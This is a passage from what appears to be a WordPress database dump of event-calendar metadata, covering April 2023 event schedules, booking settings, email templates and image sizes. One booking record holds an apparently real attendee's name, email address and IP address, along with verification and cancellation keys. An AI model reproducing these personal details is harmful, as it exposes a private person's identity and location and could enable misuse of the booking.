aily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180336,268255,'mec_certain_weekdays','a:0:{}'),(180337,268255,'mec_allday','0'),(180338,268255,'one_occurrence','0'),(180339,268255,'mec_hide_time','0'),(180340,268255,'mec_hide_end_time','0'),(180341,268255,'mec_comment',''),(180342,268255,'mec_timezone','global'),(180343,268255,'mec_countdown_method','global'),(180344,268255,'mec_public','1'),(180345,268255,'mec_start_date','2023-04-16'),(180346,268255,'mec_start_time_hour','10'),(180347,268255,'mec_start_time_minutes','30'),(180348,268255,'mec_start_time_ampm','AM'),(180349,268255,'mec_start_day_seconds','37800'),(180350,268255,'mec_end_date','2023-04-16'),(180351,268255,'mec_end_time_hour','2'),(180352,268255,'mec_end_time_minutes','0'),(180353,268255,'mec_end_time_ampm','PM'),(180354,268255,'mec_end_day_seconds','50400'),(180355,268255,'mec_repeat_status','0'),(180356,268255,'mec_repeat_type',''),(180357,268255,'mec_repeat_interval','1'),(180358,268255,'mec_repeat_end',''),(180359,268255,'mec_repeat_end_at_occurrences',''),(180360,268255,'mec_repeat_end_at_date',''),(180361,268255,'mec_advanced_days','a:0:{}'),(180362,268255,'mec_in_days',''),(180363,268255,'mec_not_in_days',''),(180364,268255,'mec_hourly_schedules','a:0:{}'),(180365,268255,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180366,268255,'mec_tickets','a:0:{}'),(180367,268255,'mec_fees_global_inheritance','1'),(180368,268255,'mec_fees','a:0:{}'),(180369,268255,'mec_ticket_variations_global_inheritance','1'),(180370,268255,'mec_ticket_variations','a:0:{}'),(180371,268255,'mec_reg_fields_global_inheritance','1'),(180372,268255,'mec_reg_fields','a:0:{}'),(180373,268255,'mec_bfixed_fields','a:0:{}'),(180374,268255,'mec_op','a:0:{}'),(180375,268255,'mec_fields','a:0:{}'),(180376,268255,'mec_event_status','EventScheduled'),(180377,268255,'mec_moved_online_link',''),(180378,268255,'mec_cancelled_reason',''),(180379,268255,'mec_display_cancellation_reason_in_single_page',''),(180380,268255,'boldgrid_hide_page_title','0'),(180381,268255,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180382,268255,'passster_activate_global_protection',NULL),(180383,268255,'passster_activate_protection',NULL),(180384,268255,'passster_protection_type','password'),(180385,268255,'boldgrid_in_page_containers','1'),(180388,268255,'_dp_original','268250'),(180387,268255,'passster_area_shortcode',''),(180389,268255,'_edit_lock','1679945660:2'),(180390,268255,'_edit_last','2'),(180391,268256,'_wp_attached_file','2023/03/colorado-springs-grand-opening.jpg'),(180392,268256,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:745;s:6:\"height\";i:472;s:4:\"file\";s:42:\"2023/03/colorado-springs-grand-opening.jpg\";s:8:\"filesize\";i:109023;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24590;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11692;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31779;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50499;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37212;}s:8:\"tileview\";a:5:{s:4:\"file\";s:42:\"colorado-springs-grand-opening-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36147;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180393,268255,'_thumbnail_id','268256'),(180394,268258,'protect_children',''),(180395,268258,'mec_color',''),(180396,268258,'mec_location_id','186'),(180397,268258,'mec_dont_show_map','0'),(180398,268258,'mec_organizer_id','1'),(180399,268258,'mec_read_more',''),(180400,268258,'mec_more_info',''),(180401,268258,'mec_more_info_title',''),(180402,268258,'mec_more_info_target','_self'),(180403,268258,'mec_cost',''),(180404,268258,'mec_currency','a:0:{}'),(180405,268258,'mec_additional_organizer_ids','a:0:{}'),(180406,268258,'mec_additional_location_ids','a:0:{}'),(180407,268258,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-21\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-21\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180408,268258,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180409,268258,'mec_certain_weekdays','a:0:{}'),(180410,268258,'mec_allday','0'),(180411,268258,'one_occurrence','0'),(180412,268258,'mec_hide_time','0'),(180413,268258,'mec_hide_end_time','0'),(180414,268258,'mec_comment',''),(180415,268258,'mec_timezone','global'),(180416,268258,'mec_countdown_method','global'),(180417,268258,'mec_public','1'),(180418,268258,'mec_start_date','2023-04-21'),(180419,268258,'mec_start_time_hour','1'),(180420,268258,'mec_start_time_minutes','0'),(180421,268258,'mec_start_time_ampm','PM'),(180422,268258,'mec_start_day_seconds','46800'),(180423,268258,'mec_end_date','2023-04-21'),(180424,268258,'mec_end_time_hour','9'),(180425,268258,'mec_end_time_minutes','0'),(180426,268258,'mec_end_time_ampm','PM'),(180427,268258,'mec_end_day_seconds','75600'),(180428,268258,'mec_repeat_status','1'),(180429,268258,'mec_repeat_type','custom_days'),(180430,268258,'mec_repeat_interval','1'),(180431,268258,'mec_repeat_end','never'),(180432,268258,'mec_repeat_end_at_occurrences','9'),(180433,268258,'mec_repeat_end_at_date',''),(180434,268258,'mec_advanced_days','a:0:{}'),(180435,268258,'mec_in_days','2023-04-22:2023-04-22:10-00-AM:07-00-PM,2023-04-23:2023-04-23:10-00-AM:06-00-PM'),(180436,268258,'mec_not_in_days',''),(180437,268258,'mec_hourly_schedules','a:0:{}'),(180438,268258,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180439,268258,'mec_tickets','a:0:{}'),(180440,268258,'mec_fees_global_inheritance','1'),(180441,268258,'mec_fees','a:0:{}'),(180442,268258,'mec_ticket_variations_global_inheritance','1'),(180443,268258,'mec_ticket_variations','a:0:{}'),(180444,268258,'mec_reg_fields_global_inheritance','1'),(180445,268258,'mec_reg_fields','a:0:{}'),(180446,268258,'mec_bfixed_fields','a:0:{}'),(180447,268258,'mec_op','a:0:{}'),(180448,268258,'mec_fields','a:0:{}'),(180449,268258,'mec_event_status','EventScheduled'),(180450,268258,'mec_moved_online_link',''),(180451,268258,'mec_cancelled_reason',''),(180452,268258,'mec_display_cancellation_reason_in_single_page',''),(180453,268258,'boldgrid_hide_page_title','0'),(180454,268258,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180455,268258,'passster_activate_global_protection',NULL),(180456,268258,'passster_activate_protection',NULL),(180457,268258,'passster_protection_type','password'),(180458,268258,'boldgrid_in_page_containers','1'),(180459,268258,'passster_area_shortcode',''),(180460,268258,'_dp_original','265240'),(180461,268258,'_edit_lock','1679944142:2'),(180462,268258,'_edit_last','2'),(180463,268259,'_wp_attached_file','2023/03/body-mind-spirit-COSP-2023.jpg'),(180464,268259,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:933;s:6:\"height\";i:488;s:4:\"file\";s:38:\"2023/03/body-mind-spirit-COSP-2023.jpg\";s:8:\"filesize\";i:126661;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18518;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10184;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-768x402.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80394;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29819;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47637;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34695;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"body-mind-spirit-COSP-2023-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33567;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180465,268258,'_thumbnail_id','268259'),(180466,268261,'mec_transaction_id','YEL51667'),(180467,268261,'mec_user_id','1000014'),(180468,268261,'mec_verified','1'),(180469,268261,'mec_verification_key','6c4b30bb28a7a5aef8df2fdbf4b3cbac'),(180470,268261,'mec_cancellation_key','c95c6758cdc36ac50995b3bcaa7a9519'),(180471,268261,'mec_confirmed','1'),(180472,268261,'mec_event_id','267433'),(180473,268261,'mec_date','1679831100:1679835600'),(180474,268261,'mec_ticket_id',',1,'),(180475,268261,'mec_booking_time','2023-03-26 10:32:34'),(180476,268261,'mec_all_dates','a:0:{}'),(180477,268261,'mec_other_dates','a:0:{}'),(180478,268261,'mec_attention_time','1679831100:1679835600'),(180479,268261,'mec_attention_time_start','1679831100'),(180480,268261,'mec_attention_time_end','1679835600'),(180481,268261,'mec_book_date_submit','20230326103234'),(180482,268261,'mec_booking_location','129'),(180483,268261,'mec_ticket_price_1','0'),(180484,268261,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"75.70.240.47\";}}'),(180485,268261,'mec_price','0'),(180486,268261,'mec_gateway','MEC_gateway_free'),(180487,268261,'mec_gateway_label','Free'),(180488,268262,'protect_children',''),(180489,268262,'mec_color',''),(180490,268262,'mec_location_id','185'),(180491,268262,'mec_dont_show_map','0'),(180492,268262,'mec_organizer_id','1'),(180493,268262,'mec_read_more',''),(180494,268262,'mec_more_info',''),(180495,268262,'mec_more_info_title',''),(180496,268262,'mec_more_info_target','_self'),(180497,268262,'mec_cost',''),(180498,268262,'mec_currency','a:0:{}'),(180499,268262,'mec_additional_organizer_ids','a:0:{}'),(180500,268262,'mec_additional_location_ids','a:0:{}'),(180501,268262,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180502,268262,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180503,268262,'mec_certain_weekdays','a:0:{}'),(180504,268262,'mec_allday','0'),(180505,268262,'one_occurrence','0'),(180506,268262,'mec_hide_time','0'),(180507,268262,'mec_hide_end_time','0'),(180508,268262,'mec_comment',''),(180509,268262,'mec_timezone','global'),(180510,268262,'mec_countdown_method','global'),(180511,268262,'mec_public','1'),(180512,268262,'mec_start_date','2023-04-09'),(180513,268262,'mec_start_time_hour','10'),(180514,268262,'mec_start_time_minutes','30'),(180515,268262,'mec_start_time_ampm','AM'),(180516,268262,'mec_start_day_seconds','37800'),(180517,268262,'mec_end_date','2023-04-09'),(180518,268262,'mec_end_time_hour','11'),(180519,268262,'mec_end_time_minutes','30'),(180520,268262,'mec_end_time_ampm','PM'),(180521,268262,'mec_end_day_seconds','84600'),(180522,268262,'mec_repeat_status','0'),(180523,268262,'mec_repeat_type',''),(180524,268262,'mec_repeat_interval','1'),(180525,268262,'mec_repeat_end',''),(180526,268262,'mec_repeat_end_at_occurrences',''),(180527,268262,'mec_repeat_end_at_date',''),(180528,268262,'mec_advanced_days','a:0:{}'),(180529,268262,'mec_in_days',''),(180530,268262,'mec_not_in_days',''),(180531,268262,'mec_hourly_schedules','a:0:{}'),(180532,268262,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180533,268262,'mec_tickets','a:0:{}'),(180534,268262,'mec_fees_global_inheritance','1'),(180535,268262,'mec_fees','a:0:{}'),(180536,268262,'mec_ticket_variations_global_inheritance','1'),(180537,268262,'mec_ticket_variations','a:0:{}'),(180538,268262,'mec_reg_fields_global_inheritance','1'),(180539,268262,'mec_reg_fields','a:0:{}'),(180540,268262,'mec_bfixed_fields','a:0:{}'),(180541,268262,'mec_op','a:0:{}'),(180542,268262,'mec_fields','a:0:{}'),(180543,268262,'mec_event_status','EventScheduled'),(180544,268262,'mec_moved_online_link',''),(180545,268262,'mec_cancelled_reason',''),(180546,268262,'mec_display_cancellation_reason_in_single_page',''),(180547,268262,'boldgrid_hide_page_title','0'),(180548,268262,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180549,268262,'passster_activate_global_protection',NULL),(180550,268262,'passster_activate_protection',NULL),(180551,268262,'passster_protection_type','password'),(180552,268262,'boldgrid_in_page_containers','1'),(180555,268262,'_dp_original','268250'),(180554,268262,'passster_area_shortcode',''),(180556,268262,'_edit_lock','1679945384:2'),(180557,268262,'_edit_last','2'),(180558,268262,'_thumbnail_id','266410'),(180559,268264,'mec_color',''),(180560,268264,'mec_location_id','185'),(180561,268264,'mec_dont_show_map','0'),(180562,268264,'mec_organizer_id','1'),(180563,268264,'mec_read_more',''),(180564,268264,'mec_more_info',''),(180565,268264,'mec_more_info_title',''),(180566,268264,'mec_more_info_target','_self'),(180567,268264,'mec_cost',''),(180568,268264,'mec_currency','a:0:{}'),(180569,268264,'mec_additional_organizer_ids','a:0:{}'),(180570,268264,'mec_additional_location_ids','a:0:{}'),(180571,268264,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180572,268264,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180573,268264,'mec_certain_weekdays','a:0:{}'),(180574,268264,'mec_allday','0'),(180575,268264,'one_occurrence','0'),(180576,268264,'mec_hide_time','0'),(180577,268264,'mec_hide_end_time','0'),(180578,268264,'mec_comment',''),(180579,268264,'mec_timezone','global'),(180580,268264,'mec_countdown_method','global'),(180581,268264,'mec_public','1'),(180582,268264,'mec_start_date','2023-04-23'),(180583,268264,'mec_start_time_hour','10'),(180584,268264,'mec_start_time_minutes','30'),(180585,268264,'mec_start_time_ampm','AM'),(180586,268264,'mec_start_day_seconds','37800'),(180587,268264,'mec_end_date','2023-04-23'),(180588,268264,'mec_end_time_hour','11'),(180589,268264,'mec_end_time_minutes','30'),(180590,268264,'mec_end_time_ampm','AM'),(180591,268264,'mec_end_day_seconds','41400'),(180592,268264,'mec_repeat_status','0'),(180593,268264,'mec_repeat_type',''),(180594,268264,'mec_repeat_interval','1'),(180595,268264,'mec_repeat_end',''),(180596,268264,'mec_repeat_end_at_occurrences',''),(180597,268264,'mec_repeat_end_at_date',''),(180598,268264,'mec_advanced_days','a:0:{}'),(180599,268264,'mec_in_days',''),(180600,268264,'mec_not_in_days',''),(180601,268264,'mec_hourly_schedules','a:0:{}'),(180602,268264,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180603,268264,'mec_tickets','a:0:{}'),(180604,268264,'mec_fees_global_inheritance','1'),(180605,268264,'mec_fees','a:0:{}'),(180606,268264,'mec_ticket_variations_global_inheritance','1'),(180607,268264,'mec_ticket_variations','a:0:{}'),(180608,268264,'mec_reg_fields_global_inheritance','1'),(180609,268264,'mec_reg_fields','a:0:{}'),(180610,268264,'mec_bfixed_fields','a:0:{}'),(180611,268264,'mec_op','a:0:{}'),(180612,268264,'mec_fields','a:0:{}'),(180613,268264,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180614,268264,'mec_event_status','EventScheduled'),(180615,268264,'mec_moved_online_link',''),(180616,268264,'mec_cancelled_reason',''),(180617,268264,'mec_display_cancellation_reason_in_single_page',''),(180618,268264,'protect_children',''),(180619,268264,'passster_activate_global_protection',NULL),(180620,268264,'passster_activate_protection',NULL),(180621,268264,'passster_protection_type','password'),(180622,268264,'boldgrid_hide_page_title','0'),(180623,268264,'_thumbnail_id','266105'),(180626,268264,'_dp_original','266311'),(180625,268264,'boldgrid_in_page_containers','1'),(180627,268264,'_edit_lock','1679946417:2'),(180628,268264,'passster_area_shortcode',''),(180629,268264,'_edit_last','2'),(180630,268265,'protect_children',''),(180631,268265,'mec_color',''),(180632,268265,'mec_location_id','121'),(180633,268265,'mec_dont_show_map','0'),(180634,268265,'mec_organizer_id','1'),(180635,268265,'mec_start_date','2023-04-14'),(180636,268265,'mec_start_time_hour','7'),(180637,268265,'mec_start_time_minutes','0'),(180638,268265,'mec_start_time_ampm','PM'),(180639,268265,'mec_start_day_seconds','68400'),(180640,268265,'mec_end_date','2023-04-14'),(180641,268265,'mec_end_time_hour','8'),(180642,268265,'mec_end_time_minutes','0'),(180643,268265,'mec_end_time_ampm','PM'),(180644,268265,'mec_end_day_seconds','72000'),(180645,268265,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-14\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-14\";s:4:\"hour\";s:1:\"8\";